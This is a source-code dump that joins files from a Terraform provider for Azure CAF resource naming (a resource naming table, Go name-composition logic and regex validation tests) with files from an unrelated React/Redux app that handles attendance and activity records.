| azurerm_stream_analytics_stream_input_iothub| asaiiot| 3| 63| false| "^[a-zA-Z0-9-_]{3,63}$"|
| azurerm_shared_image_gallery| sig| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9.]{0,78}[a-zA-Z0-9]$"|
| azurerm_shared_image| si| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9]$"|
| azurerm_snapshots| snap| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_storage_account| st| 3| 24| true| "^[a-z0-9]{3,24}$"|
| azurerm_storage_container| stct| 3| 63| false| "^[a-z0-9][a-z0-9-]{2,62}$"|
| azurerm_storage_data_lake_gen2_filesystem| stdl| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_queue| stq| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_table| stt| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_storage_share_directory| sts| 3| 63| false| "^[a-z0-9][a-z0-9-]{1,61}[a-z0-9]$"|
| azurerm_machine_learning_workspace| mlw| 1| 260| false| "^[^<>*%:.?\\+\\/]{0,259}[^<>*%:.?\\+\\/ ]$"|
| azurerm_storage_blob| blob| 1| 1024| false| "^[^\\s\\/$#&]{1,1000}[^\\s\\/$#&]{0,24}$"|
| azurerm_bastion_host| snap| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_local_network_gateway| lgw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_gateway| agw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_gateway| ergw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_express_route_circuit| erc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_point_to_site_vpn_gateway| vpngw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_template_deployment| deploy| 1| 64| false| "^[a-zA-Z0-9-._\\(\\)]{1,64}$"|
| azurerm_sql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_server| sql| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_mssql_database| sqldb| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_mssql_elasticpool| sqlep| 1| 128| false| "^[^<>*%:.?\\+\\/]{1,127}[^<>*%:.?\\+\\/ ]$"|
| azurerm_sql_failover_group| sqlfg| 1| 63| true| "^[a-z0-9][a-z0-9-]{0,61}[a-z0-9]$"|
| azurerm_sql_firewall_rule| sqlfw| 1| 128| false| "^[^<>*%:?\\+\\/]{1,127}[^<>*%:.?\\+\\/]$"|
| azurerm_log_analytics_workspace| log| 4| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,61}[a-zA-Z0-9]$"|
| azurerm_service_fabric_cluster| sf| 4| 23| true| "^[a-z][a-z0-9-]{2,21}[a-z0-9]$"|
| azurerm_maps_account| map| 1| 98| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,97}$"|
| azurerm_network_watcher| nw| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_resource_group| rg| 1| 90| false| "^[a-zA-Z0-9-._\\(\\)]{0,89}[a-zA-Z0-9-_\\(\\)]$"|
| azurerm_network_security_group| nsg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_group_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_security_rule| nsgr| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_application_security_group| asg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_zone| dns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone| pdns| 1| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,61}[a-zA-Z0-9_]$"|
| azurerm_notification_hub| nh| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,259}$"|
| azurerm_notification_hub_namespace| dnsrec| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_notification_hub_authorization_rule| dnsrec| 1| 256| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,255}$"|
| azurerm_servicebus_namespace| sb| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_namespace_authorization_rule| sbar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_queue| sbq| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9_]$"|
| azurerm_servicebus_queue_authorization_rule| sbqar| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription| sbs| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_subscription_rule| sbsr| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic| sbt| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
| azurerm_servicebus_topic_authorization_rule| dnsrec| 1| 50| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,48}[a-zA-Z0-9]$"|
| azurerm_powerbi_embedded| pbi| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{2,62}$"|
| azurerm_dashboard| dsb| 3| 160| false| "^[a-zA-Z0-9-]{3,160}$"|
| azurerm_signalr_service| sgnlr| 3| 63| false| "^[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]$"|
| azurerm_eventgrid_domain| egd| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_domain_topic| egdt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_eventgrid_event_subscription| egs| 3| 64| false| "^[a-zA-Z0-9-]{3,64}$"|
| azurerm_eventgrid_topic| egt| 3| 50| false| "^[a-zA-Z0-9-]{3,50}$"|
| azurerm_relay_namespace| rln| 6| 50| false| "^[a-zA-Z][a-zA-Z0-9-]{4,48}[a-zA-Z0-9]$"|
| azurerm_relay_hybrid_connection| rlhc| 1| 260| false| "^[a-zA-Z0-9][a-zA-Z0-9-._]{0,258}[a-zA-Z0-9]$"|
cat resourceDefinition_out_of_docs.json | jq -r '.[] | "| \(.name)| \(.slug)| \(.min_length)| \(.max_length)| \(.lowercase)| \(.validation_regex)|"'
| azurerm_private_endpoint| pe| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_service_connection| psc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_ip_configuration| fwipconf| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_application_rule_collection| fwapp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_nat_rule_collection| fwnatrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_firewall_network_rule_collection| fwnetrc| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_a_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_aaaa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_caa_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_cname_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_mx_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ns_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_ptr_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_dns_txt_record| dnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_a_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_aaaa_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_cname_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_mx_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_ptr_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_srv_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_txt_record| pdnsrec| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_extension| vmx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_virtual_machine_scale_set_extension| vmssx| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_network_ddos_protection_plan| ddospp| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_dns_zone_group| pdnszg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_proximity_placement_group| ppg| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| azurerm_private_link_service| pls| 1| 80| false| "^[a-zA-Z0-9][a-zA-Z0-9\\-\\._]{0,78}[a-zA-Z0-9_]$"|
| databricks_cluster| dbc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_standard_cluster| dbsc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
| databricks_high_concurrency_cluster| dbhcc| 3| 30| false| "^[a-zA-Z0-9-_]{3,30}$"|
<file_sep>/azurecaf/resource_name.go
package azurecaf
import (
"context"
"fmt"
"regexp"
"strings"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/schema"
"github.com/hashicorp/terraform-plugin-sdk/v2/helper/validation"
)
func resourceNameV2() *schema.Resource {
resourceMapsKeys := make([]string, 0, len(ResourceDefinitions))
for k := range ResourceDefinitions {
resourceMapsKeys = append(resourceMapsKeys, k)
}
return &schema.Resource{
Schema: map[string]*schema.Schema{
"name": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "",
},
"prefixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
"suffixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
"random_length": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
ValidateFunc: validation.IntAtLeast(0),
Default: 0,
},
"result": {
Type: schema.TypeString,
Computed: true,
},
"results": {
Type: schema.TypeMap,
Elem: &schema.Schema{
Type: schema.TypeString,
},
Computed: true,
},
"separator": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "-",
},
"clean_input": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
"passthrough": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: false,
},
"resource_type": {
Type: schema.TypeString,
Optional: true,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
ForceNew: true,
},
"resource_types": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
},
Optional: true,
ForceNew: true,
},
"random_seed": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
},
},
}
}
func resourceNameStateUpgradeV2(ctx context.Context, rawState map[string]interface{}, meta interface{}) (map[string]interface{}, error) {
rawState["use_slug"] = true
return rawState, nil
}
func resourceName() *schema.Resource {
resourceMapsKeys := make([]string, 0, len(ResourceDefinitions))
for k := range ResourceDefinitions {
resourceMapsKeys = append(resourceMapsKeys, k)
}
return &schema.Resource{
Create: resourceNameCreate,
Read: schema.Noop,
Delete: schema.RemoveFromState,
SchemaVersion: 3,
StateUpgraders: []schema.StateUpgrader{
{
Type: resourceNameV2().CoreConfigSchema().ImpliedType(),
Upgrade: resourceNameStateUpgradeV2,
Version: 2,
},
},
Schema: map[string]*schema.Schema{
"name": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "",
},
"prefixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
"suffixes": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.NoZeroValues,
},
Optional: true,
ForceNew: true,
},
"random_length": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
ValidateFunc: validation.IntAtLeast(0),
Default: 0,
},
"result": {
Type: schema.TypeString,
Computed: true,
},
"results": {
Type: schema.TypeMap,
Elem: &schema.Schema{
Type: schema.TypeString,
},
Computed: true,
},
"separator": {
Type: schema.TypeString,
Optional: true,
ForceNew: true,
Default: "-",
},
"clean_input": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
"passthrough": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: false,
},
"resource_type": {
Type: schema.TypeString,
Optional: true,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
ForceNew: true,
},
"resource_types": {
Type: schema.TypeList,
Elem: &schema.Schema{
Type: schema.TypeString,
ValidateFunc: validation.StringInSlice(resourceMapsKeys, false),
},
Optional: true,
ForceNew: true,
},
"random_seed": {
Type: schema.TypeInt,
Optional: true,
ForceNew: true,
},
"use_slug": {
Type: schema.TypeBool,
Optional: true,
ForceNew: true,
Default: true,
},
},
}
}
func resourceNameCreate(d *schema.ResourceData, meta interface{}) error {
return resourceNameRead(d, meta)
}
func resourceNameRead(d *schema.ResourceData, meta interface{}) error {
return getNameResult(d, meta)
}
func resourceNameDelete(d *schema.ResourceData, meta interface{}) error {
return nil
}
func cleanSlice(names []string, resourceDefinition *ResourceStructure) []string {
for i, name := range names {
names[i] = cleanString(name, resourceDefinition)
}
return names
}
func cleanString(name string, resourceDefinition *ResourceStructure) string {
myRegex, _ := regexp.Compile(resourceDefinition.RegEx)
return myRegex.ReplaceAllString(name, "")
}
func concatenateParameters(separator string, parameters ...[]string) string {
elems := []string{}
for _, items := range parameters {
for _, item := range items {
if len(item) > 0 {
elems = append(elems, []string{item}...)
}
}
}
return strings.Join(elems, separator)
}
func getResource(resourceType string) (*ResourceStructure, error) {
if resourceKey, existing := ResourceMaps[resourceType]; existing {
resourceType = resourceKey
}
if resource, resourceFound := ResourceDefinitions[resourceType]; resourceFound {
return &resource, nil
}
return nil, fmt.Errorf("invalid resource type %s", resourceType)
}
// Retrieve the resource slug / shortname based on the resourceType and the selected convention
func getSlug(resourceType string, convention string) string {
if convention == ConventionCafClassic || convention == ConventionCafRandom {
if val, ok := ResourceDefinitions[resourceType]; ok {
return val.CafPrefix
}
}
return ""
}
func trimResourceName(resourceName string, maxLength int) string {
var length int = len(resourceName)
if length > maxLength {
length = maxLength
}
return string(resourceName[0:length])
}
func convertInterfaceToString(source []interface{}) []string {
s := make([]string, len(source))
for i, v := range source {
s[i] = fmt.Sprint(v)
}
return s
}
func composeName(separator string,
prefixes []string,
name string,
slug string,
suffixes []string,
randomSuffix string,
maxlength int,
namePrecedence []string) string {
contents := []string{}
currentlength := 0
for i := 0; i < len(namePrecedence); i++ {
initialized := 0
if len(contents) > 0 {
initialized = len(separator)
}
switch c := namePrecedence[i]; c {
case "name":
if len(name) > 0 {
if currentlength+len(name)+initialized <= maxlength {
contents = append(contents, name)
currentlength = currentlength + len(name) + initialized
}
}
case "slug":
if len(slug) > 0 {
if currentlength+len(slug)+initialized <= maxlength {
contents = append([]string{slug}, contents...)
currentlength = currentlength + len(slug) + initialized
}
}
case "random":
if len(randomSuffix) > 0 {
if currentlength+len(randomSuffix)+initialized <= maxlength {
contents = append(contents, randomSuffix)
currentlength = currentlength + len(randomSuffix) + initialized
}
}
case "suffixes":
if len(suffixes) > 0 {
if len(suffixes[0]) > 0 {
if currentlength+len(suffixes[0])+initialized <= maxlength {
contents = append(contents, suffixes[0])
currentlength = currentlength + len(suffixes[0]) + initialized
}
}
suffixes = suffixes[1:]
if len(suffixes) > 0 {
i--
}
}
case "prefixes":
if len(prefixes) > 0 {
if len(prefixes[len(prefixes)-1]) > 0 {
if currentlength+len(prefixes[len(prefixes)-1])+initialized <= maxlength {
contents = append([]string{prefixes[len(prefixes)-1]}, contents...)
currentlength = currentlength + len(prefixes[len(prefixes)-1]) + initialized
}
}
prefixes = prefixes[:len(prefixes)-1]
if len(prefixes) > 0 {
i--
}
}
}
}
content := strings.Join(contents, separator)
return content
}
func validateResourceType(resourceType string, resourceTypes []string) (bool, error) {
isEmpty := len(resourceType) == 0 && len(resourceTypes) == 0
if isEmpty {
return false, fmt.Errorf("resource_type and resource_types parameters are empty, you must specify at least one resource type")
}
errorStrings := []string{}
resourceList := resourceTypes
if len(resourceType) > 0 {
resourceList = append(resourceList, resourceType)
}
for _, resource := range resourceList {
_, err := getResource(resource)
if err != nil {
errorStrings = append(errorStrings, err.Error())
}
}
if len(errorStrings) > 0 {
return false, fmt.Errorf(strings.Join(errorStrings, "\n"))
}
return true, nil
}
func getResourceName(resourceTypeName string, separator string,
prefixes []string,
name string,
suffixes []string,
randomSuffix string,
convention string,
cleanInput bool,
passthrough bool,
useSlug bool,
namePrecedence []string) (string, error) {
resource, err := getResource(resourceTypeName)
if err != nil {
return "", err
}
validationRegEx, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
return "", err
}
slug := ""
if useSlug {
slug = getSlug(resourceTypeName, convention)
}
if cleanInput {
prefixes = cleanSlice(prefixes, resource)
suffixes = cleanSlice(suffixes, resource)
name = cleanString(name, resource)
separator = cleanString(separator, resource)
randomSuffix = cleanString(randomSuffix, resource)
}
var resourceName string
if passthrough {
resourceName = name
} else {
resourceName = composeName(separator, prefixes, name, slug, suffixes, randomSuffix, resource.MaxLength, namePrecedence)
}
resourceName = trimResourceName(resourceName, resource.MaxLength)
if resource.LowerCase {
resourceName = strings.ToLower(resourceName)
}
if !validationRegEx.MatchString(resourceName) {
return "", fmt.Errorf("invalid name for CAF naming %s %s, the pattern %s doesn't match %s", resource.ResourceTypeName, name, resource.ValidationRegExp, resourceName)
}
return resourceName, nil
}
func getNameResult(d *schema.ResourceData, meta interface{}) error {
name := d.Get("name").(string)
prefixes := convertInterfaceToString(d.Get("prefixes").([]interface{}))
suffixes := convertInterfaceToString(d.Get("suffixes").([]interface{}))
separator := d.Get("separator").(string)
resourceType := d.Get("resource_type").(string)
resourceTypes := convertInterfaceToString(d.Get("resource_types").([]interface{}))
cleanInput := d.Get("clean_input").(bool)
passthrough := d.Get("passthrough").(bool)
useSlug := d.Get("use_slug").(bool)
randomLength := d.Get("random_length").(int)
randomSeed := int64(d.Get("random_seed").(int))
convention := ConventionCafClassic
randomSuffix := randSeq(int(randomLength), &randomSeed)
namePrecedence := []string{"name", "slug", "random", "suffixes", "prefixes"}
isValid, err := validateResourceType(resourceType, resourceTypes)
if !isValid {
return err
}
if len(resourceType) > 0 {
resourceName, err := getResourceName(resourceType, separator, prefixes, name, suffixes, randomSuffix, convention, cleanInput, passthrough, useSlug, namePrecedence)
if err != nil {
return err
}
d.Set("result", resourceName)
}
resourceNames := make(map[string]string, len(resourceTypes))
for _, resourceTypeName := range resourceTypes {
var err error
resourceNames[resourceTypeName], err = getResourceName(resourceTypeName, separator, prefixes, name, suffixes, randomSuffix, convention, cleanInput, passthrough, useSlug, namePrecedence)
if err != nil {
return err
}
}
d.Set("results", resourceNames)
d.SetId(randSeq(16, nil))
return nil
}
<file_sep>/azurecaf/models_generated_test.go
package azurecaf
import (
"regexp"
"strings"
"testing"
)
func TestCompileRegexValidation(t *testing.T) {
for _, resource := range ResourceDefinitions {
_, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
t.Logf("Error on the validation regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
t.Fail()
}
_, err = regexp.Compile(resource.RegEx)
if err != nil {
t.Logf("Error on the regex %s for the resource %s error %v", resource.RegEx, resource.ResourceTypeName, err.Error())
t.Fail()
}
}
}
func TestStrimingNameRegexValidation(t *testing.T) {
for _, resource := range ResourceDefinitions {
reg, err := regexp.Compile(resource.RegEx)
if err != nil {
t.Logf("Error on the regex %s for the resource %s error %v", resource.RegEx, resource.ResourceTypeName, err.Error())
t.Fail()
}
content := "abcde"
result := reg.ReplaceAllString(content, "")
if len(result) != 5 {
t.Logf("%s : expected not be clear anything startd with %s end with %s", resource.ResourceTypeName, content, result)
t.Fail()
}
}
}
func TestRegexValidationMinLength(t *testing.T) {
content := "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
contentBase := []rune(content)
for _, resource := range ResourceDefinitions {
exp, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
t.Logf("Error on the regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
t.Fail()
}
min := resource.MinLength
// Added here because there is a bug on the golang regex
if min == 1 {
min = 2
}
test := string(contentBase[0:min])
if !exp.MatchString(test) {
t.Logf("Error on the regex %s for the resource %s min length %v", resource.ValidationRegExp, resource.ResourceTypeName, resource.MinLength)
t.Fail()
}
}
}
func TestRegexValidationMaxLength(t *testing.T) {
content := "aaaaaaaaaa"
for i := 0; i < 200; i++ {
content = strings.Join([]string{content, "aaaaaaaaaa"}, "")
}
contentBase := []rune(content)
for _, resource := range ResourceDefinitions {
exp, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
t.Logf("Error on the regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
t.Fail()
}
max := resource.MaxLength
test := string(contentBase[0:max])
if !exp.MatchString(test) {
t.Logf("Error on the regex %s for the resource %s at max length %v", resource.ValidationRegExp, resource.ResourceTypeName, resource.MaxLength)
t.Fail()
}
testGreater := string(contentBase[0 : max+1])
if exp.MatchString(testGreater) {
t.Logf("Error on the regex %s for the resource %s greater than max length %v", resource.ValidationRegExp, resource.ResourceTypeName, resource.MaxLength)
t.Fail()
}
}
}
func TestRegexValidationDashes(t *testing.T) {
content := "aaa-aaa"
for _, resource := range ResourceDefinitions {
exp, err := regexp.Compile(resource.ValidationRegExp)
if err != nil {
t.Logf("Error on the regex %s for the resource %s error %v", resource.ValidationRegExp, resource.ResourceTypeName, err.Error())
t.Fail()
}
dashes := resource.Dashes
if exp.MatchString(content) == !dashes {
t.Logf("Error on the regex %s for the resource %s using dashes", resource.ValidationRegExp, resource.ResourceTypeName)
t.Fail()
}
}
}
| 113179ca47356243ff1c716072a9a918853803e0 | [
"Markdown",
"Go",
"Makefile"
] | 25 | Go | aztfmod/terraform-provider-azurecaf | e3a8ca154e4b6ea107dd06d8096be52d0454b1e0 | 0aea2c47bc9333fc27ae944841ac373c456015b9 |
refs/heads/master | <repo_name>inv-Karan/argo_ll_react<file_sep>/src/ActionCreators/activityAction.js
import {activityConstants} from '../Constants/activityConstant'
import {showActivity, addActivity, deleteActivity, updateActivity} from '../Utility/API/activityServices'
function activityShow(activities) {
return {
type: activityConstants.ACTIVITY_SHOW,
payload: activities
};
};
function activityUpdate(activities) {
return {
type: activityConstants.ACTIVITY_UPDATE,
payload: activities
};
};
function activityAdd(activities) {
return {
type: activityConstants.ACTIVITY_NEW,
payload: activities
};
};
function activityDelete(activities) {
return {
type: activityConstants.ACTIVITY_DELETE,
payload: activities
};
};
function getActivity(userId) {
return dispatch => {
showActivity(userId)
.then(res => {
const data = res.data.activities
dispatch(activityShow(data))
})
.catch(err => {
})
};
};
function editActivity(id, data) {
debugger
return dispatch => {
updateActivity(id, data)
.then(res => {
debugger
const data = res.data.activities
dispatch(activityUpdate(data))
})
.catch(err => {
debugger
})
};
};
function newActivity(obj) {
return dispatch => {
addActivity(obj)
.then(res => {
const data = res.data.activities
dispatch(activityAdd(data))
})
.catch(err => {
})
};
};
function removeActivity(obj) {
return dispatch => {
deleteActivity(obj)
.then(res => {
const data = res.data.activities
dispatch(activityDelete(data))
})
.catch(err => {
})
};
};
export {getActivity, editActivity, newActivity, removeActivity}<file_sep>/src/Reducers/indexReducers.js
import {combineReducers} from 'redux';
import {authentication} from './signinReducers';
import {registration} from './signupReducers';
import {alert} from './alertReducers';
import {userReducers} from './userReducers';
import {attendanceReducers} from './attendanceReducer';
import {queryReducers} from './queryReducer';
import {permitReducers} from './permitReducer';
import {newsReducers} from './newsReducer';
import {notificationReducers} from './notificationReducer';
import {activityReducers} from './activityReducer'
const rootReducer = combineReducers({
authentication,
registration,
alert,
userReducers,
attendanceReducers,
queryReducers,
permitReducers,
newsReducers,
notificationReducers,
activityReducers
});
export default rootReducer;<file_sep>/src/container/Attendance/index.js
import React, { Component } from "react";
import { connect } from 'react-redux';
import { getAttendance, editAttendance, newAttendance, removeAttendance } from '../../ActionCreators/attendenceAction'
class Attendance extends Component {
constructor(props) {
super(props);
this.state = {
"user_id": 1,
"location": "dfgd",
"lat": "123",
"lng": "3242",
"time": "09:14:36",
"date": "2020-07-16",
"type": "clock_in",
"weather": "111"
};
};
getLocation = () => {
if (navigator.geolocation) {
navigator.geolocation.watchPosition(this.showPosition);
} else {
console.log('error in Location')
};
};
showPosition = (position) => {
this.setState({
lat: position.coords.latitude,
long: position.coords.longitude
})
};
componentDidMount() {
this.getLocation()
this.props.getAttendance(1)
};
handleShowAttendance = () => {
// const obj = this.state;
debugger
this.props.getAttendance(1)
};
handleUpdateAttendance = () => {
const obj = this.state;
// obj.weather = Date.now().toString()
debugger
this.props.editAttendance(12, obj)
};
handleNewAttendance = () => {
const obj = this.state;
debugger
this.props.newAttendance(obj)
};
handleDeleteAttendance = () => {
const obj = this.state;
debugger
this.props.removeAttendance(obj)
};
render() {
console.log(this.props.details)
return (
<div>
dsfdsfs
<button onClick={() => {
this.handleShowAttendance()
}}>Display attendance</button>
<button onClick={() => {
this.handleUpdateAttendance()
}}>Update attendance</button>
<button onClick={() => {
this.handleNewAttendance()
}}>New attendance</button>
<button onClick={() => {
this.handleDeleteAttendance()
}}>Delete attendance</button>
</div>
);
};
};
const mapStateToProps = (state) => {
return {
details: state.attendanceReducers.details
};
};
const mapDispatchToProps = {
getAttendance,
editAttendance,
newAttendance,
removeAttendance
};
export default connect(mapStateToProps, mapDispatchToProps)(Attendance);<file_sep>/src/Constants/attendanceConstant.js
export const attendanceConstants = {
ATTENDANCE_SHOW: 'ATTENDANCE_SHOW',
